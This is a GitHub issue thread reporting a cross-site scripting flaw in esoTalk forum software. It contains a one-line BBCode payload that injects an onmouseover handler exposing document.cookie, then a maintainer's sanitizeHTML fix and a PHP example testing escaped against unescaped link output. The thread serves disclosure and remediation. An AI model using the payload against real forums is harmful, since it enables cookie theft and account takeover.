esotalk / esoTalk

Fat-free forum software.
GNU General Public License v2.0

esotalk topic xss vulnerability #377

Closed evi1m0 closed 9 years ago

evi1m0 commented 9 years ago

Payload:

[url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#"aaaaaa[/img]]evi1m0[/url]

Proof:

andrewks777 commented 9 years ago

Fix:

https://github.com/esotalk/esoTalk/blob/develop/core/lib/ETFormat.class.php

public function formatLink($url, $text = null)

    public function formatLink($url, $text = null)
    {
        if ($text === null) $text = $url;
        $url = sanitizeHTML($url);
        $text = sanitizeHTML($text);
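The fix above escapes both arguments inside formatLink. The following is an added example, not esoTalk's code and not part of the thread: it parses the generated markup and checks that the link carries no attribute other than href. All function names, the markup shape, and the input are constructed for illustration, and esc() stands in for sanitizeHTML(), which is assumed to entity-encode both quote styles.

```php
<?php
// Added example, not esoTalk code. All function names here are hypothetical.

// Stand-in for the project's sanitizeHTML(): assumed to entity-encode
// HTML metacharacters, including both quote styles.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// "Before": URL and text reach the markup unescaped.
function formatLinkUnsafe(string $url, ?string $text = null): string
{
    if ($text === null) $text = $url;
    return "<a href='" . $url . "'>" . $text . "</a>";
}

// "After": both values are escaped where they enter the HTML.
function formatLinkSafe(string $url, ?string $text = null): string
{
    if ($text === null) $text = $url;
    return "<a href='" . esc($url) . "'>" . esc($text) . "</a>";
}

// Parse the markup with an HTML parser and list the attribute names
// that ended up on the first <a> element.
function anchorAttributes(string $html): array
{
    libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    $doc->loadHTML('<div>' . $html . '</div>');
    $names = [];
    $a = $doc->getElementsByTagName('a')->item(0);
    if ($a !== null) {
        foreach ($a->attributes as $attr) {
            $names[] = $attr->nodeName;
        }
    }
    sort($names);
    return $names;
}

// Constructed input: a URL value carrying a quote and a harmless marker attribute.
$url = "http://example.com/image.jpg' data-injected='1";

foreach (['formatLinkUnsafe', 'formatLinkSafe'] as $fn) {
    $attrs = anchorAttributes($fn($url, 'link'));
    $verdict = ($attrs === ['href']) ? ' (ok)' : ' (attribute injected)';
    echo $fn, ': attributes = ', implode(',', $attrs), $verdict, PHP_EOL;
}
```

Escaping at the sink only stops the value from leaving the attribute; it does not restrict which URL schemes the link may use, which needs a separate allow-list check.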